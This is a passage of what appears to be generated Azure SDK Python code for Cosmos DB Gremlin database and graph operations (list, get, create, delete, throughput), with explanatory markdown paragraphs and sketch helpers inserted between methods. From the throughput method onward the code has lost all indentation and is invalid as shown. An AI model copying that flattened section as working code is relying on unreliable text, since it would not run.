        deserialized = models.GremlinDatabasePaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list_gremlin_databases.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases'}
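`prepare_request` above branches on the continuation token: the first page hits the formatted operation URL with an `api-version` query parameter, while later pages use the service-returned `next_link` verbatim, with no extra query parameters. A small sketch of that branch in isolation (the helper name is illustrative, not SDK API):

```python
def build_page_request(first_page_url, api_version, next_link=None):
    # First page: the operation's own URL plus the api-version query string
    if not next_link:
        return first_page_url, {'api-version': api_version}
    # Continuation pages: the nextLink already encodes everything needed
    return next_link, {}
```

The paged model (`GremlinDatabasePaged`) calls this style of callback lazily, so pages are only fetched as the iterator is consumed.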

    def get_gremlin_database(
            self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
        """Gets the Gremlin database under an existing Azure Cosmos DB database
        account with the provided name.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param database_name: Cosmos DB database name.
        :type database_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: GremlinDatabase or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.cosmosdb.models.GremlinDatabase or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get_gremlin_database.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'databaseName': self._serialize.url("database_name", database_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('GremlinDatabase', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_gremlin_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}'}

    def _create_update_gremlin_database_initial(
            self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, **operation_config):
        create_update_gremlin_database_parameters = models.GremlinDatabaseCreateUpdateParameters(resource=resource, options=options)

        # Construct URL
        url = self.create_update_gremlin_database.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'databaseName': self._serialize.url("database_name", database_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(create_update_gremlin_database_parameters, 'GremlinDatabaseCreateUpdateParameters')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('GremlinDatabase', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def create_update_gremlin_database(
            self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
        """Create or update an Azure Cosmos DB Gremlin database.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param database_name: Cosmos DB database name.
        :type database_name: str
        :param resource: The standard JSON format of a Gremlin database
        :type resource: ~azure.mgmt.cosmosdb.models.GremlinDatabaseResource
        :param options: A key-value pair of options to be applied for the
         request. This corresponds to the headers sent with the request.
        :type options: dict[str, str]
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for a personal polling strategy
        :return: An instance of LROPoller that returns GremlinDatabase or
         ClientRawResponse<GremlinDatabase> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.GremlinDatabase]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.GremlinDatabase]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._create_update_gremlin_database_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            database_name=database_name,
            resource=resource,
            options=options,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('GremlinDatabase', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    create_update_gremlin_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}'}

    def _delete_gremlin_database_initial(
            self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
        # Construct URL
        url = self.delete_gremlin_database.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'databaseName': self._serialize.url("database_name", database_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.delete(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def delete_gremlin_database(
            self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, polling=True, **operation_config):
        """Deletes an existing Azure Cosmos DB Gremlin database.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param database_name: Cosmos DB database name.
        :type database_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for a personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._delete_gremlin_database_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            database_name=database_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    delete_gremlin_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}'}
def get_gremlin_database_throughput(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the Gremlin database under an existing Azure
Cosmos DB database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_gremlin_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_gremlin_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/settings/throughput'}
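The `accountName` path parameter above is serialized with length bounds (3-50) and the pattern `^[a-z0-9]+(-[a-z0-9]+)*`. A minimal client-side pre-check mirroring those constraints might look like the sketch below; note the trailing `$` anchor is added here for full-string matching, which the generated pattern leaves implicit:

```python
import re

# Pattern and length bounds copied from the generated serializer calls above;
# the trailing '$' is added so the whole string must match.
ACCOUNT_NAME_RE = re.compile(r'^[a-z0-9]+(-[a-z0-9]+)*$')

def is_valid_account_name(name):
    """Return True if `name` satisfies the accountName constraints."""
    return 3 <= len(name) <= 50 and ACCOUNT_NAME_RE.match(name) is not None
```

Validating locally before the call avoids a round trip only to have the serializer raise; the real `_serialize.url` still performs its own check.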
def _update_gremlin_database_throughput_initial(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_gremlin_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_gremlin_database_throughput(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of an Azure Cosmos DB Gremlin database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_gremlin_database_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_gremlin_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/settings/throughput'}
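The `metadata['url']` template is expanded by `format_url` after each path argument is serialized; the substitution itself is plain `str.format`-style replacement, as this standalone sketch shows (the subscription and resource names are made up):

```python
# The throughput URL template from the metadata dict above.
URL_TEMPLATE = (
    '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}'
    '/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}'
    '/apis/gremlin/databases/{databaseName}/settings/throughput'
)

def build_throughput_url(subscription_id, resource_group, account, database):
    # format_url in the real client also handles base-URL joining and quoting;
    # this sketch only shows the placeholder substitution.
    return URL_TEMPLATE.format(
        subscriptionId=subscription_id,
        resourceGroupName=resource_group,
        accountName=account,
        databaseName=database,
    )
```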
def list_gremlin_graphs(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Lists the Gremlin graph under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator-like instance of GremlinGraph
:rtype:
~azure.mgmt.cosmosdb.models.GremlinGraphPaged[~azure.mgmt.cosmosdb.models.GremlinGraph]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_gremlin_graphs.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.GremlinGraphPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_gremlin_graphs.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs'}
def get_gremlin_graph(
self, resource_group_name, account_name, database_name, graph_name, custom_headers=None, raw=False, **operation_config):
"""Gets the Gremlin graph under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param graph_name: Cosmos DB graph name.
:type graph_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: GremlinGraph or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.GremlinGraph or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_gremlin_graph.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'graphName': self._serialize.url("graph_name", graph_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GremlinGraph', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_gremlin_graph.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs/{graphName}'}
def _create_update_gremlin_graph_initial(
self, resource_group_name, account_name, database_name, graph_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_gremlin_graph_parameters = models.GremlinGraphCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_gremlin_graph.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'graphName': self._serialize.url("graph_name", graph_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_gremlin_graph_parameters, 'GremlinGraphCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GremlinGraph', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_gremlin_graph(
self, resource_group_name, account_name, database_name, graph_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or update an Azure Cosmos DB Gremlin graph.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param graph_name: Cosmos DB graph name.
:type graph_name: str
:param resource: The standard JSON format of a Gremlin graph
:type resource: ~azure.mgmt.cosmosdb.models.GremlinGraphResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GremlinGraph or
ClientRawResponse<GremlinGraph> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.GremlinGraph]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.GremlinGraph]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_gremlin_graph_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
graph_name=graph_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GremlinGraph', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_gremlin_graph.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs/{graphName}'}
def _delete_gremlin_graph_initial(
self, resource_group_name, account_name, database_name, graph_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_gremlin_graph.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'graphName': self._serialize.url("graph_name", graph_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_gremlin_graph(
self, resource_group_name, account_name, database_name, graph_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB Gremlin graph.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param graph_name: Cosmos DB graph name.
:type graph_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_gremlin_graph_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
graph_name=graph_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_gremlin_graph.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs/{graphName}'}
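Every long-running operation above selects its polling strategy the same way: `polling=True` builds an `ARMPolling` with the LRO delay, `polling=False` disables polling, and anything else is taken as a caller-supplied polling object. The trichotomy can be isolated as a small helper; the two stub classes below stand in for the msrest types so the sketch is self-contained:

```python
class ARMPolling:
    """Stub for the ARM polling strategy (the real one lives in msrest/msrestazure)."""
    def __init__(self, timeout):
        self.timeout = timeout

class NoPolling:
    """Stub: return the initial response without polling."""

def select_polling_method(polling, lro_delay):
    # Mirrors the `if polling is True / is False / else` block in the
    # generated methods. The identity checks matter: a truthy value such
    # as 1 is treated as a custom polling object, not as True.
    if polling is True:
        return ARMPolling(lro_delay)
    if polling is False:
        return NoPolling()
    return polling
```

The identity comparison is a deliberate design choice in the generated code: it lets callers pass any polling object without it being mistaken for a boolean flag.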
